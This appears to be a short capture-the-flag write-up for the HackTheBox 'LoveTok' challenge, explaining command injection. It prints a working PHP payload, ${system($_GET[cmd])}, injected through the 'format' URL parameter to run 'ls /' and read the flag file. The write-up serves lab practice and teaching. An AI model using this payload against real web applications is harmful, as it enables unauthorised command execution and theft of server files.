We briefly explained command injection as one of the top 10 web application vulnerabilities. Command injection allows an attacker to execute system commands directly from the web browser due to the lack of input valid checks on the backend or the webserver side. We used HackTheBox LoveTok challenge to fully demonstrate this subject.. This was part of HackTheBox LoveTok.
The Complete Penetration Testing with BackBox Course
True love is tough, and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛
Video Highlights
In command injection, the attacker-injected code gets executed by the underlying OS allowing the attacker to execute system commands to discover sensitive files, navigate through the directory structure, create files and of course plant reverse shells and backdoors. In verbose command injection, the output is returned to the user where a decision can be formed if the system is vulnerable to command injection.
In the challenge, we inject the “format” parameter in the URL below
http://IP:PORT/?format=r
We used the below webshell to achieve command injection
${system($_GET[cmd])}&cmd=ls /
And to retrieve the flag just type
${system($_GET[cmd])}&cmd=cat /flagname
Video Walkthrough
